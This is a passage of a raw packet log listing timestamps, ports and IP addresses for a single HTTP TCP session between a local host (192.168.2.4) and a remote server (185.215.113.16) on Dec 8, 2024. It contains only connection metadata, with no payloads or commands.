Dec 8, 2024 19:52:40.296783924 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.297041893 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.297148943 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.297200918 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.297224045 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.297262907 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.298064947 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.298109055 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.298135996 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.298439980 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.298914909 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.298952103 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.298993111 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.299583912 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.299624920 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.299658060 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.299714088 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.300350904 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.300442934 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.300494909 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.301083088 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.301136017 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.301191092 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.301228046 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.301918983 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.301955938 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.302119017 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.302151918 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.302814960 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.302963972 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.303004980 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.303930998 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.303978920 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.304065943 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.304101944 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.304698944 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.304742098 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.304744005 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.304775953 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.305675030 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.305711031 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.305809975 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.305844069 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.306211948 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.306247950 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.306291103 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.306327105 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.306848049 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.306889057 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.306921005 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.306956053 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.307672024 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.307746887 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.307775021 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.307810068 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.308640957 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.308748007 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.308792114 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.309452057 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.309551001 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.309596062 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.310372114 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.310441017 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.310489893 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.311208963 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.311264992 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.311302900 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.311336994 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.312089920 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.312134027 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.312206984 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.312242031 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.312999964 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.313097954 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.313141108 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.313889027 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.313946962 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.314023018 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.314060926 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.314762115 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.314812899 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.314867973 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.314912081 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.315651894 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.315756083 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.315800905 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.316565990 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.316615105 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.316696882 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.316745996 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.317475080 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.317516088 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.317543983 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.317627907 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.318326950 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.318377018 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.318461895 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.318499088 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.319194078 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.319248915 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.319355011 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.319396973 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.320112944 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.320159912 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.320188999 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.320229053 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.320988894 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.321101904 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.321146965 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.321857929 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.321903944 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.321957111 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.322021008 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.322755098 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.322791100 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.322875977 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.322916031 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.323632002 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.323733091 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.323740959 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.323766947 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.324522972 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.324558973 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.324711084 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.324765921 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.325479031 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.325555086 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.325566053 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.325608969 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.326272964 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.326318026 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.326400995 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.326497078 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.327172041 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.327286005 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.327336073 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.328111887 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.328160048 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.328217030 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.328252077 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.328962088 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.329020023 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.329047918 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.329082966 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.329873085 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.330035925 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.330075026 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.330877066 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.330923080 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.330976009 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.331012011 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.331700087 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.331748009 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.331813097 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.331849098 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.332648993 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.332694054 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.332843065 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.332885027 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.333415031 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.333453894 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.333621979 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.334325075 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.334372044 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.334393978 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.334429979 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.335284948 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.335447073 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.335493088 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.336306095 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.336344004 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.336437941 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.336474895 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.337233067 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.337290049 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.337374926 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.337409973 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.338315964 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.338416100 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.338417053 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.338466883 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.339471102 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.339534044 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.339668036 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.339744091 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.340286016 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.340342999 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.340396881 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.340969086 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.341025114 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.341089010 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.341140032 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.341684103 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.341737032 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.341743946 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.341777086 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.488130093 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.488181114 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.488272905 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.488497019 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.488542080 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.488682985 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.488719940 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.489207029 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.489248991 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.489272118 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.489306927 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.490080118 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.490129948 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.490288019 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.490326881 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.490976095 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.491017103 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.491067886 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.491848946 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.491897106 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.491933107 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.491969109 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.492748976 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.492790937 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.492835045 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.492875099 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.493614912 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.493627071 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.493658066 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.493675947 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.494474888 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.494564056 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.494618893 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.495366096 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.495515108 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.495574951 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.496285915 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.496345997 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.496370077 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.496412992 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.497232914 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.497277021 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.497335911 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.497374058 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.498109102 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.498155117 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.498256922 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.498296022 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.498934984 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.499166965 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.499213934 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.499823093 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.499855995 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.499869108 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.499905109 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.500696898 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.500793934 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.500814915 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.500855923 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.501631021 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.501679897 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.501844883 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.501884937 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.502585888 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.502629995 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.502688885 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.502728939 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.503437042 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.503482103 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.503534079 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.503573895 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.504241943 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.504302979 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.504343033 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.505136013 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.505207062 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.505259991 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.505295038 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.505985022 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.506035089 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.506073952 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.506119013 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.506895065 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.506944895 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.506980896 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.507021904 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.507777929 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.507848978 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.507852077 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.507885933 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.508662939 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.508816957 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.508856058 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.509537935 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.509587049 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.509643078 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.509685040 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.510435104 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.510498047 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.510524988 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.510567904 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.511297941 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.511342049 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.511406898 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.511449099 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.512190104 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.512233973 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.512347937 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.512389898 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.513073921 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.513117075 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.513257027 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.513302088 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.513959885 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.514003038 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.514029980 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.514067888 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.514854908 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.514983892 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.515028954 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.515736103 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.515779018 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.515841961 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.515888929 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.516623974 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.516668081 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.516750097 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.516789913 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.517493963 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.517535925 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.517651081 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.517689943 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.518429995 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.518496990 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.518529892 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.518569946 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.519260883 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.519354105 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.519407034 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.520178080 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.520226955 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.520298004 CET	80	49757	185.215.113.16	192.168.2.4
Dec 8, 2024 19:52:40.520344973 CET	49757	80	192.168.2.4	185.215.113.16
Dec 8, 2024 19:52:40.521014929 CET	80	49757	185.215.113.16	192.168.2.4
